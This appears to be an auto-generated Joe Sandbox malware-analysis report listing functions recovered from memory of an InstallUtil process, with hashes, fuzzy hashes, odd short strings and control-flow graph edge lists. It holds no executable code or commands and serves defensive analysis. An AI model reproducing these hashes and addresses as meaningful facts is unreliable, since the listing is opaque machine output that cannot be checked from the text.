                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xbq$Xbq$Xbq$Xbq
                                                                      • API String ID: 0-2732225958
                                                                      • Opcode ID: 472695fbb1692c3a6e7c32c18e1d0370d0326d145f15d4b314130e5aba03f770
                                                                      • Instruction ID: ac84da36b44f087b294cd0158bb768ab17be5f9578b3a494476bc0c14c01c30e
                                                                      • Opcode Fuzzy Hash: 472695fbb1692c3a6e7c32c18e1d0370d0326d145f15d4b314130e5aba03f770
                                                                      • Instruction Fuzzy Hash: BFB1A2769582AA8FCB175FB888786A9BF71FF4B300F0C4ED5C4857B945D6306A82C781
                                                                      Function 022A5C08 Relevance: 4.0, Strings: 3, Instructions: 232COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1406 22a5c08-22a5c15 1407 22a5c1d-22a5c1f 1406->1407 1408 22a5c17-22a5c1b 1406->1408 1410 22a5e30-22a5e37 1407->1410 1408->1407 1409 22a5c24-22a5c2f 1408->1409 1411 22a5e38 1409->1411 1412 22a5c35-22a5c3c 1409->1412 1415 22a5e3d-22a5e75 1411->1415 1413 22a5c42-22a5c51 1412->1413 1414 22a5dd1-22a5dd7 1412->1414 1413->1415 1416 22a5c57-22a5c66 1413->1416 1417 22a5dd9-22a5ddb 1414->1417 1418 22a5ddd-22a5de1 1414->1418 1431 22a5e7e-22a5e82 1415->1431 1432 22a5e77-22a5e7c 1415->1432 1424 22a5c7b-22a5c7e 1416->1424 1425 22a5c68-22a5c6b 1416->1425 1417->1410 1419 22a5e2e 1418->1419 1420 22a5de3-22a5de9 1418->1420 1419->1410 1420->1411 1421 22a5deb-22a5dee 1420->1421 1421->1411 1426 22a5df0-22a5e05 1421->1426 1428 22a5c8a-22a5c90 1424->1428 1430 22a5c80-22a5c83 1424->1430 1425->1428 1429 22a5c6d-22a5c70 1425->1429 1444 22a5e29-22a5e2c 1426->1444 1445 22a5e07-22a5e0d 1426->1445 1438 22a5ca8-22a5cc5 1428->1438 1439 22a5c92-22a5c98 1428->1439 1433 22a5d71-22a5d77 1429->1433 1434 22a5c76 1429->1434 1435 22a5cd6-22a5cdc 1430->1435 1436 22a5c85 1430->1436 1440 22a5e88-22a5e8a 1431->1440 1432->1440 1450 22a5d79-22a5d7f 1433->1450 1451 22a5d8f-22a5d99 1433->1451 1441 22a5d9c-22a5d9e 1434->1441 1442 22a5cde-22a5ce4 1435->1442 1443 22a5cf4-22a5d06 1435->1443 1436->1441 1476 22a5cce-22a5cd1 1438->1476 1446 22a5c9a 1439->1446 1447 22a5c9c-22a5ca6 1439->1447 1448 22a5e9f-22a5ea6 1440->1448 1449 22a5e8c-22a5e9e 1440->1449 1460 22a5da7-22a5da9 1441->1460 1452 22a5ce8-22a5cf2 1442->1452 1453 22a5ce6 1442->1453 1471 22a5d08-22a5d14 1443->1471 1472 22a5d16-22a5d39 1443->1472 1444->1410 1454 22a5e1f-22a5e22 1445->1454 1455 22a5e0f-22a5e1d 1445->1455 1446->1438 1447->1438 1456 22a5d83-22a5d8d 1450->1456 1457 22a5d81 1450->1457 1451->1441 1452->1443 1453->1443 1454->1411 1461 22a5e24-22a5e27 1454->1461 1455->1411 1455->1454 1456->1451 1457->1451 1468 22a5dab-22a5daf 1460->1468 1469 22a5dbd-22a5dbf 1460->1469 1461->1444 1461->1445 1468->1469 1473 22a5db1-22a5db5 1468->1473 1474 22a5dc3-22a5dc6 1469->1474 1480 22a5d61-22a5d6f 1471->1480 1472->1411 1482 22a5d3f-22a5d42 1472->1482 1473->1411 1477 22a5dbb 1473->1477 1474->1411 1478 22a5dc8-22a5dcb 1474->1478 1476->1441 1477->1474 1478->1413 1478->1414 1480->1441 1482->1411 1484 22a5d48-22a5d5a 1482->1484 1484->1480
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,bq$,bq$8fi
                                                                      • API String ID: 0-1241842371
                                                                      • Opcode ID: c8084b7fdf7d7af0d025e0dc404d9bde970eef311e4e7fe38e047231c6901833
                                                                      • Instruction ID: 7ceb5da4068ccb04fe3a304ea402733cc221694767d7eed229b49f37f349cd0e
                                                                      • Opcode Fuzzy Hash: c8084b7fdf7d7af0d025e0dc404d9bde970eef311e4e7fe38e047231c6901833
                                                                      • Instruction Fuzzy Hash: C581B134E20506DFCB14CFA8C9A8AABB7B2BF89314B948169E405DBB69D731D851CB50
                                                                      Function 022A77F0 Relevance: 3.2, Strings: 2, Instructions: 707COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1922 22a77f0-22a7cde 1997 22a8230-22a8265 1922->1997 1998 22a7ce4-22a7cf4 1922->1998 2003 22a8271-22a828f 1997->2003 2004 22a8267-22a826c 1997->2004 1998->1997 1999 22a7cfa-22a7d0a 1998->1999 1999->1997 2000 22a7d10-22a7d20 1999->2000 2000->1997 2002 22a7d26-22a7d36 2000->2002 2002->1997 2005 22a7d3c-22a7d4c 2002->2005 2015 22a8291-22a829b 2003->2015 2016 22a8306-22a8312 2003->2016 2006 22a8356-22a835b 2004->2006 2005->1997 2008 22a7d52-22a7d62 2005->2008 2008->1997 2009 22a7d68-22a7d78 2008->2009 2009->1997 2011 22a7d7e-22a7d8e 2009->2011 2011->1997 2012 22a7d94-22a7da4 2011->2012 2012->1997 2014 22a7daa-22a7dba 2012->2014 2014->1997 2017 22a7dc0-22a822f 2014->2017 2015->2016 2021 22a829d-22a82a9 2015->2021 2022 22a8329-22a8335 2016->2022 2023 22a8314-22a8320 2016->2023 2031 22a82ab-22a82b6 2021->2031 2032 22a82ce-22a82d1 2021->2032 2029 22a834c-22a834e 2022->2029 2030 22a8337-22a8343 2022->2030 2023->2022 2028 22a8322-22a8327 2023->2028 2028->2006 2029->2006 2113 22a8350 call 22a87e9 2029->2113 2030->2029 2042 22a8345-22a834a 2030->2042 2031->2032 2044 22a82b8-22a82c2 2031->2044 2034 22a82e8-22a82f4 2032->2034 2035 22a82d3-22a82df 2032->2035 2038 22a835c-22a837e 2034->2038 2039 22a82f6-22a82fd 2034->2039 2035->2034 2046 22a82e1-22a82e6 2035->2046 2049 22a838e 2038->2049 2050 22a8380 2038->2050 2039->2038 2043 22a82ff-22a8304 2039->2043 2042->2006 2043->2006 2044->2032 2051 22a82c4-22a82c9 2044->2051 2046->2006 2054 22a8390-22a8391 2049->2054 2050->2049 2053 22a8387-22a838c 2050->2053 2051->2006 2053->2054 2113->2006
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $^q$$^q
                                                                      • API String ID: 0-355816377
                                                                      • Opcode ID: f34830c415e911969e30fc5f33e670d57a182dd451b177f92456626a29b8c65c
                                                                      • Instruction ID: 2c99ddd883b2521ed23db54ce2b75bfd96e6ee2a1f3d7a137610bceb2eb64ea4
                                                                      • Opcode Fuzzy Hash: f34830c415e911969e30fc5f33e670d57a182dd451b177f92456626a29b8c65c
                                                                      • Instruction Fuzzy Hash: 85523274A0021CCFEB559BA4C860BAEBBB6EF84300F1085A9D10A7B765CF359E85DF51
                                                                      Function 022A87E9 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2462 22a87e9-22a8805 2463 22a8811-22a881d 2462->2463 2464 22a8807-22a880c 2462->2464 2467 22a881f-22a8821 2463->2467 2468 22a882d-22a8832 2463->2468 2465 22a8ba6-22a8bab 2464->2465 2469 22a8829-22a882b 2467->2469 2468->2465 2469->2468 2470 22a8837-22a8843 2469->2470 2472 22a8853-22a8858 2470->2472 2473 22a8845-22a8851 2470->2473 2472->2465 2473->2472 2475 22a885d-22a8868 2473->2475 2477 22a886e-22a8879 2475->2477 2478 22a8912-22a891d 2475->2478 2481 22a887b-22a888d 2477->2481 2482 22a888f 2477->2482 2483 22a8923-22a8932 2478->2483 2484 22a89c0-22a89cc 2478->2484 2485 22a8894-22a8896 2481->2485 2482->2485 2491 22a8943-22a8952 2483->2491 2492 22a8934-22a893e 2483->2492 2493 22a89ce-22a89da 2484->2493 2494 22a89dc-22a89ee 2484->2494 2487 22a8898-22a88a7 2485->2487 2488 22a88b6-22a88bb 2485->2488 2487->2488 2499 22a88a9-22a88b4 2487->2499 2488->2465 2501 22a8976-22a897f 2491->2501 2502 22a8954-22a8960 2491->2502 2492->2465 2493->2494 2503 22a8a1c-22a8a27 2493->2503 2506 22a8a12-22a8a17 2494->2506 2507 22a89f0-22a89fc 2494->2507 2499->2488 2510 22a88c0-22a88c9 2499->2510 2516 22a8981-22a8993 2501->2516 2517 22a8995 2501->2517 2512 22a896c-22a8971 2502->2512 2513 22a8962-22a8967 2502->2513 2514 22a8b09-22a8b14 2503->2514 2515 22a8a2d-22a8a36 2503->2515 2506->2465 2526 22a8a08-22a8a0d 2507->2526 2527 22a89fe-22a8a03 2507->2527 2521 22a88cb-22a88d0 2510->2521 2522 22a88d5-22a88e4 2510->2522 2512->2465 2513->2465 2529 22a8b3e-22a8b4d 2514->2529 2530 22a8b16-22a8b20 2514->2530 2531 22a8a38-22a8a4a 2515->2531 2532 22a8a4c 2515->2532 2518 22a899a-22a899c 2516->2518 2517->2518 2518->2484 2524 22a899e-22a89aa 2518->2524 2521->2465 2538 22a8908-22a890d 2522->2538 2539 22a88e6-22a88f2 2522->2539 2542 22a89ac-22a89b1 2524->2542 2543 22a89b6-22a89bb 2524->2543 2526->2465 2527->2465 2545 22a8b4f-22a8b5e 2529->2545 2546 22a8ba1 2529->2546 2548 22a8b22-22a8b2e 2530->2548 2549 22a8b37-22a8b3c 2530->2549 2534 22a8a51-22a8a53 2531->2534 2532->2534 2540 22a8a63 2534->2540 2541 22a8a55-22a8a61 2534->2541 2538->2465 2555 22a88fe-22a8903 2539->2555 2556 22a88f4-22a88f9 2539->2556 2547 22a8a68-22a8a6a 2540->2547 2541->2547 2542->2465 2543->2465 2545->2546 2558 22a8b60-22a8b78 2545->2558 2546->2465 2552 22a8a6c-22a8a71 2547->2552 2553 22a8a76-22a8a89 2547->2553 2548->2549 2560 22a8b30-22a8b35 2548->2560 2549->2465 2552->2465 2561 22a8a8b 2553->2561 2562 22a8ac1-22a8acb 2553->2562 2555->2465 2556->2465 2573 22a8b9a-22a8b9f 2558->2573 2574 22a8b7a-22a8b98 2558->2574 2560->2465 2564 22a8a8e-22a8a9f call 22a8258 2561->2564 2569 22a8aea-22a8af6 2562->2569 2570 22a8acd-22a8ad9 call 22a8258 2562->2570 2571 22a8aa1-22a8aa4 2564->2571 2572 22a8aa6-22a8aab 2564->2572 2579 22a8af8-22a8afd 2569->2579 2580 22a8aff 2569->2580 2584 22a8adb-22a8ade 2570->2584 2585 22a8ae0-22a8ae5 2570->2585 2571->2572 2576 22a8ab0-22a8ab3 2571->2576 2572->2465 2573->2465 2574->2465 2581 22a8ab9-22a8abf 2576->2581 2582 22a8bac-22a8bd4 2576->2582 2586 22a8b04 2579->2586 2580->2586 2581->2562 2581->2564 2589 22a8be0-22a8beb 2582->2589 2590 22a8bd6-22a8bdb 2582->2590 2584->2569 2584->2585 2585->2465 2586->2465 2594 22a8c93-22a8c9c 2589->2594 2595 22a8bf1-22a8bfc 2589->2595 2591 22a8d61-22a8d65 2590->2591 2598 22a8c9e-22a8ca9 2594->2598 2599 22a8ce7-22a8cf2 2594->2599 2600 22a8bfe-22a8c10 2595->2600 2601 22a8c12 2595->2601 2610 22a8d5f 2598->2610 2611 22a8caf-22a8cc1 2598->2611 2608 22a8d08 2599->2608 2609 22a8cf4-22a8d06 2599->2609 2602 22a8c17-22a8c19 2600->2602 2601->2602 2605 22a8c1b-22a8c2a 2602->2605 2606 22a8c4e-22a8c60 2602->2606 2605->2606 2619 22a8c2c-22a8c42 2605->2619 2606->2610 2618 22a8c66-22a8c74 2606->2618 2612 22a8d0d-22a8d0f 2608->2612 2609->2612 2610->2591 2611->2610 2620 22a8cc7-22a8ccb 2611->2620 2612->2610 2616 22a8d11-22a8d20 2612->2616 2626 22a8d48 2616->2626 2627 22a8d22-22a8d2b 2616->2627 2630 22a8c80-22a8c83 2618->2630 2631 22a8c76-22a8c7b 2618->2631 2619->2606 2637 22a8c44-22a8c49 2619->2637 2623 22a8ccd-22a8cd2 2620->2623 2624 22a8cd7-22a8cda 2620->2624 2623->2591 2628 22a8ce0-22a8ce3 2624->2628 2629 22a8d66-22a8d96 call 22a8378 2624->2629 2632 22a8d4d-22a8d4f 2626->2632 2641 22a8d2d-22a8d3f 2627->2641 2642 22a8d41 2627->2642 2628->2620 2634 22a8ce5 2628->2634 2649 22a8d98-22a8dac 2629->2649 2650 22a8dad-22a8db1 2629->2650 2630->2629 2635 22a8c89-22a8c8c 2630->2635 2631->2591 2632->2610 2636 22a8d51-22a8d5d 2632->2636 2634->2610 2635->2618 2640 22a8c8e 2635->2640 2636->2591 2637->2591 2640->2610 2645 22a8d46 2641->2645 2642->2645 2645->2632
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q
                                                                      • API String ID: 0-2697143702
                                                                      • Opcode ID: bef43a4615bce5e67f38598e219f52fc9b0e574e72adaf0aec03ec127f79208c
                                                                      • Instruction ID: 8a6ed6ea1148b78504c788384a9f770e0ebf2464fa898e786250f5ad1de7c11c
                                                                      • Opcode Fuzzy Hash: bef43a4615bce5e67f38598e219f52fc9b0e574e72adaf0aec03ec127f79208c
                                                                      • Instruction Fuzzy Hash: 0EB182707741028FDB199E68C978B397796EF85704F1408AAE502CFBA9EB69CC42C743
                                                                      Function 022A56A8 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2652 22a56a8-22a56ca 2653 22a56cc-22a56d0 2652->2653 2654 22a56e0-22a56eb 2652->2654 2655 22a56f8-22a56ff 2653->2655 2656 22a56d2-22a56de 2653->2656 2657 22a5793-22a57bf 2654->2657 2658 22a56f1-22a56f3 2654->2658 2660 22a571f-22a5728 2655->2660 2661 22a5701-22a5708 2655->2661 2656->2654 2656->2655 2665 22a57c6-22a581e 2657->2665 2659 22a578b-22a5790 2658->2659 2754 22a572a call 22a56a8 2660->2754 2755 22a572a call 22a5698 2660->2755 2661->2660 2662 22a570a-22a5715 2661->2662 2664 22a571b-22a571d 2662->2664 2662->2665 2664->2659 2684 22a582d-22a583f 2665->2684 2685 22a5820-22a5826 2665->2685 2666 22a5730-22a5732 2667 22a573a-22a5742 2666->2667 2668 22a5734-22a5738 2666->2668 2672 22a5751-22a5753 2667->2672 2673 22a5744-22a5749 2667->2673 2668->2667 2671 22a5755-22a5774 call 22a6108 2668->2671 2678 22a5789 2671->2678 2679 22a5776-22a577f 2671->2679 2672->2659 2673->2672 2678->2659 2758 22a5781 call 22aa70d 2679->2758 2759 22a5781 call 22aa650 2679->2759 2681 22a5787 2681->2659 2687 22a58d3-22a58d5 2684->2687 2688 22a5845-22a5849 2684->2688 2685->2684 2756 22a58d7 call 22a5a60 2687->2756 2757 22a58d7 call 22a5a70 2687->2757 2689 22a584b-22a5857 2688->2689 2690 22a5859-22a5866 2688->2690 2698 22a5868-22a5872 2689->2698 2690->2698 2691 22a58dd-22a58e3 2692 22a58ef-22a58f6 2691->2692 2693 22a58e5-22a58eb 2691->2693 2696 22a58ed 2693->2696 2697 22a5951-22a59b0 2693->2697 2696->2692 2713 22a59b7-22a59db 2697->2713 2701 22a589f-22a58a3 2698->2701 2702 22a5874-22a5883 2698->2702 2703 22a58af-22a58b3 2701->2703 2704 22a58a5-22a58ab 2701->2704 2710 22a5893-22a589d 2702->2710 2711 22a5885-22a588c 2702->2711 2703->2692 2708 22a58b5-22a58b9 2703->2708 2706 22a58f9-22a594a 2704->2706 2707 22a58ad 2704->2707 2706->2697 2707->2692 2712 22a58bf-22a58d1 2708->2712 2708->2713 2710->2701 2711->2710 2712->2692 2721 22a59dd-22a59df 2713->2721 2722 22a59e1-22a59e3 2713->2722 2723 22a5a59-22a5a5c 2721->2723 2724 22a59f4-22a59f6 2722->2724 2725 22a59e5-22a59e9 2722->2725 2728 22a59f8-22a59fc 2724->2728 2729 22a5a09-22a5a0f 2724->2729 2731 22a59eb-22a59ed 2725->2731 2732 22a59ef-22a59f2 2725->2732 2733 22a59fe-22a5a00 2728->2733 2734 22a5a02-22a5a07 2728->2734 2736 22a5a3a-22a5a3c 2729->2736 2737 22a5a11-22a5a38 2729->2737 2731->2723 2732->2723 2733->2723 2734->2723 2741 22a5a43-22a5a45 2736->2741 2737->2741 2742 22a5a4b-22a5a4d 2741->2742 2743 22a5a47-22a5a49 2741->2743 2745 22a5a4f-22a5a54 2742->2745 2746 22a5a56 2742->2746 2743->2723 2745->2723 2746->2723 2754->2666 2755->2666 2756->2691 2757->2691 2758->2681 2759->2681
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Hbq$Hbq
                                                                      • API String ID: 0-4258043069
                                                                      • Opcode ID: 3846dd8ab3432e0d4dd2ee93bef9e4effcb973eb53f82a0debde03d9bcc5f2ad
                                                                      • Instruction ID: 8364c88a90da3e52ace31af0c436b4bf8d5910282a89577486d61b9f6ec40936
                                                                      • Opcode Fuzzy Hash: 3846dd8ab3432e0d4dd2ee93bef9e4effcb973eb53f82a0debde03d9bcc5f2ad
                                                                      • Instruction Fuzzy Hash: C6B1D130B142158FCB159FB8C864B7B7BE2BF88310F548969E846CB799DB74C855CB90
                                                                      Function 022A3428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xbq$Xbq
                                                                      • API String ID: 0-1243427068
                                                                      • Opcode ID: c826fdb228548d4406f3371266463233b33370a3f1b2d4bd2eb4171fbb97445b
                                                                      • Instruction ID: 69cc3225794a77dfbfc7d0f286ca66837b22142a5678f71da1bb0ca0eaf5833d
                                                                      • Opcode Fuzzy Hash: c826fdb228548d4406f3371266463233b33370a3f1b2d4bd2eb4171fbb97445b
                                                                      • Instruction Fuzzy Hash: A1310931B243168BDF1DCAF959B427EA6DAABC4310F144479E806D7B88DFB4CC4087A1
                                                                      Function 022A0C8F Relevance: 1.7, Strings: 1, Instructions: 401COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: d6f4534ca2497dc479a7c0d0d5f8d77a1330bcc56551cdc5689ba08636b655fc
                                                                      • Instruction ID: 3087c440ac6f8b5a35062782c1b368efdad4b989861de085ebadbd2edbee3fac
                                                                      • Opcode Fuzzy Hash: d6f4534ca2497dc479a7c0d0d5f8d77a1330bcc56551cdc5689ba08636b655fc
                                                                      • Instruction Fuzzy Hash: 0522AB7495021ACFCB64EF64E994A9DBBF1FF48311F1085A5E409AB368DB706D85CF80
                                                                      Function 022A0CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LR^q
                                                                      • API String ID: 0-2625958711
                                                                      • Opcode ID: 5e26274a63fb686edfdd91b911587e4d57d82ccf71790ad20ab21e282b2d22d3
                                                                      • Instruction ID: 786a429b9bcd7bcd33e4bed5916ed59cc2c13685338cac4def6792fba19441e1
                                                                      • Opcode Fuzzy Hash: 5e26274a63fb686edfdd91b911587e4d57d82ccf71790ad20ab21e282b2d22d3
                                                                      • Instruction Fuzzy Hash: C222BC7494021ACFCB54EF68E994A9DBBF1FF48311F1085A5E409AB368DB706D85CF90
                                                                      Function 04B18174 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 04B182B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4155663119.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_4b10000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b39d839bc5221e58fbb27a887fed7c0230ba53f438f1455d2087c60fea29b005
                                                                      • Instruction ID: 051cd24f2998d17ba03181acd852c6ba950d6e5c4803f34e2e80e023808bd764
                                                                      • Opcode Fuzzy Hash: b39d839bc5221e58fbb27a887fed7c0230ba53f438f1455d2087c60fea29b005
                                                                      • Instruction Fuzzy Hash: D3117F74E015098FCB04EFA8E484AADBBB5FF88304F9491A5F904E7255DB30A941CB60
                                                                      Function 022AA650 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o^q
                                                                      • API String ID: 0-74704288
                                                                      • Opcode ID: 8767ecf976346b449bbfdc74ef16b095da7826bff97448e894716efae205d95a
                                                                      • Instruction ID: cc611993c304010be6ee0b0206488a9644d211004b359b5b8714e97b07fb487c
                                                                      • Opcode Fuzzy Hash: 8767ecf976346b449bbfdc74ef16b095da7826bff97448e894716efae205d95a
                                                                      • Instruction Fuzzy Hash: C441C035B502189FCB199F7898646EE7BF6EFC8310F244469D906DB791CE319C06CB94
                                                                      Function 022A4DC8 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8fi
                                                                      • API String ID: 0-3538974951
                                                                      • Opcode ID: c69c079fe7fd18129b515f444fcaa529808bc8de54ce90f441cb0f3efb6cb1b8
                                                                      • Instruction ID: 4979ef7486880d3b933374221134649e754c551a4b8376e2bd60dd44f79868fb
                                                                      • Opcode Fuzzy Hash: c69c079fe7fd18129b515f444fcaa529808bc8de54ce90f441cb0f3efb6cb1b8
                                                                      • Instruction Fuzzy Hash: 8931A17174010A9FCF06AFA4D854AAF7BB2FF88311F108425F9558B695CB75CD61CBA0
                                                                      Function 022A76D0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8fi
                                                                      • API String ID: 0-3538974951
                                                                      • Opcode ID: 85ff9bcfc3d74d688002bf1ef76b0f676aca9eb3942a9d378592204baa07c90f
                                                                      • Instruction ID: 4a27a234a33d81247e9eea3cb1f2f472531f81a76fb99922272f78d403b205db
                                                                      • Opcode Fuzzy Hash: 85ff9bcfc3d74d688002bf1ef76b0f676aca9eb3942a9d378592204baa07c90f
                                                                      • Instruction Fuzzy Hash: 3D2103353202064BEB2506758CA4BBDA7A7AFC8708B184079D506CBB99EF24CC43D789
                                                                      Function 022A76E0 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8fi
                                                                      • API String ID: 0-3538974951
                                                                      • Opcode ID: f06ab1c8421d03c8a74a9c237a6e28c827ee6bcbe28aafede16a3fb809ffd6f4
                                                                      • Instruction ID: b529f69d4e7de5796a90a62ee2dafb6d67b23f5a2fb2bf23d1e5bc048c4b2de3
                                                                      • Opcode Fuzzy Hash: f06ab1c8421d03c8a74a9c237a6e28c827ee6bcbe28aafede16a3fb809ffd6f4
                                                                      • Instruction Fuzzy Hash: DC21D0353202064BEB281665CCA4BBEB6979FC4B18F148078D506CBB9CEF65CC82D789
                                                                      Function 022A5A70 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8fi
                                                                      • API String ID: 0-3538974951
                                                                      • Opcode ID: 30127c3fbdaf760cdaba5b5e2c334c56e16b04c7289ae983f912c3b54bd39ece
                                                                      • Instruction ID: faf4ea5ea6eb0816b58ad01e5b86a0e3705c392266acc54aea3bf130225a0562
                                                                      • Opcode Fuzzy Hash: 30127c3fbdaf760cdaba5b5e2c334c56e16b04c7289ae983f912c3b54bd39ece
                                                                      • Instruction Fuzzy Hash: 1F210231B116228FC7199A65D4A462FB3A6FFC87157448569E90BDB798CF34DC12CBC0
                                                                      Function 022A4DB9 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8fi
                                                                      • API String ID: 0-3538974951
                                                                      • Opcode ID: c8965ce00b32a8c898f29e5e6541f1173d34e8a8d7cb46d54d02623e8425b0c1
                                                                      • Instruction ID: 9c667c57c98d3f1ce8769a13fce612d1397909daf6ec43443d3aa347192cc90f
                                                                      • Opcode Fuzzy Hash: c8965ce00b32a8c898f29e5e6541f1173d34e8a8d7cb46d54d02623e8425b0c1
                                                                      • Instruction Fuzzy Hash: 94215771B4410A8FDB16AFA4D4647AB3BF2EB88310F10802AF849CB295CB74CD56CBD0
                                                                      Function 022A5A60 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4149662751.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_22a0000_InstallUtil.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8fi
                                                                      • API String ID: 0-3538974951
                                                                      • Opcode ID: c829a23481367fbd19c3514e6c7ec0708f2a9105124237d305000db687863061
